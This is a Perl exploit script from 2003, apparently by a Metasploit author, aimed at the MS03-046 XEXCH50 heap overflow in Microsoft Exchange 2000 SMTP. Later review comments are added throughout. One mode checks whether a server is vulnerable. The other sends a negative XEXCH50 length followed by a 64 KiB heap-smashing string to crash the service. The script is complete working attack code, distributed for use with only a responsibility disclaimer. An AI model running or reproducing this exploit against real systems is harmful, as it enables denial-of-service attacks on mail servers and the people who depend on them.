Microsoft Exchange 2000 XEXCH50 Heap Overflow Test Script (MS03-046)
Date: 2003-10-22

Author : hdm <hdm@metasploit.com>
Download : http://www.security-corporation.com/assets/security/download/exploit/ms03-046.pl

#!/usr/bin/perl -w
##################

##
# ms03-046.pl - hdm[at]metasploit.com
##

# minor bugfix: look for 354 Send binary data

use strict;
use IO::Socket;

# Command-line handling: the first argument is the target host (mandatory,
# otherwise the synopsis is printed), the second is the mode and defaults
# to CHECK. $host and $port are file-level lexicals read by check()/crash().
my $host = shift() || usage();
my $mode = shift() || "CHECK";
my $port = 25;

# Mode names are matched case-insensitively; an unknown mode falls through
# to usage(). Both handlers terminate the process themselves, so usage()
# is only ever reached when no handler matched.
my %handler_for = (
    CHECK => \&check,
    CRASH => \&crash,
);

my $handler = $handler_for{ uc($mode) };
$handler->() if $handler;

usage();


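# CHECK mode: connect to $host:$port (file-level lexicals), issue
# "XEXCH50 2 2" and report whether the server accepts the verb before
# any authentication. Every path terminates the process with exit(0),
# so the exit status never reflects the result; only the printed
# "[*]" line does. Never returns.
sub check
{
    my $s = SMTP($host, $port);
    if (! $s)
    {
        print "[*] Error establishing connection to SMTP service.\n";
        exit(0);
    }

    print $s "XEXCH50 2 2\r\n";
    my $res = <$s>;
    close ($s);

    # <$s> yields undef when the server drops the connection instead of
    # answering. Test for that explicitly so the regex below is never
    # applied to undef (which only emitted a warning under -w before
    # taking this branch anyway). A patched server only allows XEXCH50
    # after NTLM authentication, so anything but "354 Send binary" is
    # reported as patched / not vulnerable.
    if (!defined($res) || $res !~ /354 Send binary/i)
    {
        print "[*] This server has been patched or is not vulnerable.\n";
        exit(0);
    }

    print "[*] This system is vulnerable: $host:$port\n";

    exit(0);
}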


# CRASH mode: the denial-of-service trigger for MS03-046. Reads the
# file-level $host and $port, always terminates with exit(0) and never
# returns. Nothing sent after the XEXCH50 verb is acknowledged or read
# back, so this mode cannot report whether the service was affected.
sub crash
{
my $s = SMTP($host, $port);
if (! $s)
{
print "[*] Error establishing connection to SMTP service.\n";
exit(0);
}

# the negative value allows us to overwrite random heap bits
print $s "XEXCH50 -1 2\r\n";
my $res = <$s>;

# NOTE(review): $res is undef when the server closes the connection
# instead of answering; the match below then warns under -w and takes
# the "patched" branch, which is the desired outcome but is noisy.
# a patched server only allows XEXCH50 after NTLM authentication
if ($res !~ /354 Send binary/i)
{
print "[*] This server has been patched or is not vulnerable.\n";
exit(0);
}

print "[*] Sending massive heap-smashing string...\n";
# 16384 repetitions of a 4-byte token, i.e. 64 KiB written in one print;
# the print's return value and any reply are not checked.
print $s ("META" x 16384);

# sometimes a second connection is required to trigger the crash
# NOTE(review): the result of this reconnect is stored in $s but never
# inspected, so a refused or failed connection here is indistinguishable
# from success -- the script exits 0 and prints nothing either way.
$s = SMTP($host, $port);

exit(0);
}


# Write the command-line synopsis to STDERR and terminate the process
# with status 0. $0 is the script name as invoked. Never returns.
sub usage
{
    my $synopsis = "Usage: $0 <host> [CHECK|CRASH]\n";
    print STDERR $synopsis;
    exit(0);
}

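# Open a TCP connection to $host:$port and walk the SMTP dialogue up to
# RCPT TO, leaving the caller positioned to send the next verb.
#
# Parameters:
#   $host    - peer address passed straight to IO::Socket::INET.
#   $port    - peer port.
#   $timeout - optional connect timeout in seconds (default 10). It bounds
#              only the connect; the line reads below still block until
#              the peer answers or closes the connection.
#
# Returns the connected IO::Socket::INET handle, or an empty return (undef
# in scalar context, as every caller uses it) when the connection fails,
# the banner does not contain "Microsoft", or the peer closes the
# connection at any step. Only the banner mismatch prints a diagnostic.
sub SMTP
{
    my ($host, $port, $timeout) = @_;
    $timeout = 10 unless defined $timeout;

    # Low-precedence "or" so the whole constructor call is the left operand.
    my $s = IO::Socket::INET->new(
        PeerAddr => $host,
        PeerPort => $port,
        Proto    => "tcp",
        Timeout  => $timeout,
    ) or return;

    # readline returns undef (not "") at EOF, so "defined" is the right test.
    my $r = <$s>;
    return if !defined($r);

    # The banner substring is the only fingerprint this helper applies.
    if ($r !~ /Microsoft/)
    {
        chomp($r);
        print STDERR "[*] This does not look like an exchange server: $r\n";
        return;
    }

    # Reply codes are deliberately not checked (same as the original); only
    # a closed connection aborts the handshake.
    for my $cmd ("HELO X\r\n", "MAIL FROM: DoS\r\n", "RCPT TO: Administrator\r\n")
    {
        print $s $cmd;
        $r = <$s>;
        return if !defined($r);
    }

    return $s;
}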






Any use of this code is at the user's own responsibility.

 
